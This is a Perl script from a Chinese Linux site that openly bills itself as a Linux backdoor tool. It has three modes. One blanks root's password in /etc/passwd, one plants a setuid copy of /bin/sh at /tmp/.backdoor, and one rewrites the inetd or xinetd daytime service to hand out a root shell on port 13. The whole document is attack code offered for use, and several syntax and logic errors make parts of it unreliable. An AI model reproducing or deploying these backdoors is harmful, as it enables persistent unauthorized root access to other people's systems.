您查看的文章来源于http://www.oklinux.cn
print "++++++++++++++++++++++++++++++++++++linux后门工具+++++++++++++++++++++++++++++++++++\n"; print "使用说明,有三中模式rushroot,fakebackdoor,和rushport,rushroot是加一个账号到passwd中,用户名是root,密码为空n fakebackdoor是绑定一个shell到/tmp/.backdoor下,运行后直接取得root shell,rushport是绑定端口在daytime服务中\n,有两个版本,一个是针对redhatlinux7.0一下的--rushport1,一个是针对redhatlinux7.0以上的--rushport2.\n一般服务器都不开这个服务,程序自动激活daytime服务,telnet到13端口直接取得rootshell 这种方法隐蔽性相对前两中最好\n,记住要重启daytime服务才能生效\n eg: rush rushroot,程序还有很多可以优化的地方,如果有什么好的改进请email to gaomeigaocuo\@hotmail.com\n by 流氓我一生\n"; $parameter = @;ARGV[0]; chomp $parameter; if ($parameter = "rushroot") { &rushroot; } elsif ($parameter = "fakebackdoor") { &fakebackdoor; } elsif($parameter = "rushport") { &rushport1; } else ($parameter = "rushport2") { &rushport2; } sub rushroot { open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n"; while() { chop; $passwd.="$_\n"; last; } chomp $passwd; if($passwd eq "root:x:0:0:root:/root:/bin/bash") { $passwd =~s/x//g; print "rushroot success!now you can get a rootshell with null passwd"; } else { print "faild....something wrong....:((("; } while() { chomp; $passwd1.="$_\n"; } close PWD; open (PWD,">/etc/passwd")||die "why?"; print PWD $passwd; print PWD $passwd1; } sub fakebackdoor { @cpsh = ("cp", "/bin/sh /tmp/.backdoor"); @chmod= ("chmod","u+s /tmp/.backdoor"); system(@cpsh); system(@chmod); print "success! now you can use ./tmp/.backdoor to get a root shell\n"; } sub rushport1 { open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; #这里根据版本不同可自己修改路径 while() { chomp; $passwd.="$_\n"; chomp $passwd; if ($passwd eq "daytime stream tcp nowait root internal") { $passwd =~s/root internal/bin\/sh -i/g; } last; close RH6; open (RH6,">/etc/inetd.d/inetd.conf")||die "faild...:("; # #这里根据版本不同可自己修改路径 print RH6 $passwd; print "success! now you can telnet romote host at port 13 after reboot the daytime session\n"; } } sub rushport2 { open (DAYTIME,">/etc/xinetd.d/daytime") || die "can't open file!"; $daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n"; print DAYTIME $daytime; print "success! now you can telnet romote host at port 13 after reboot the daytime session\n"; }
|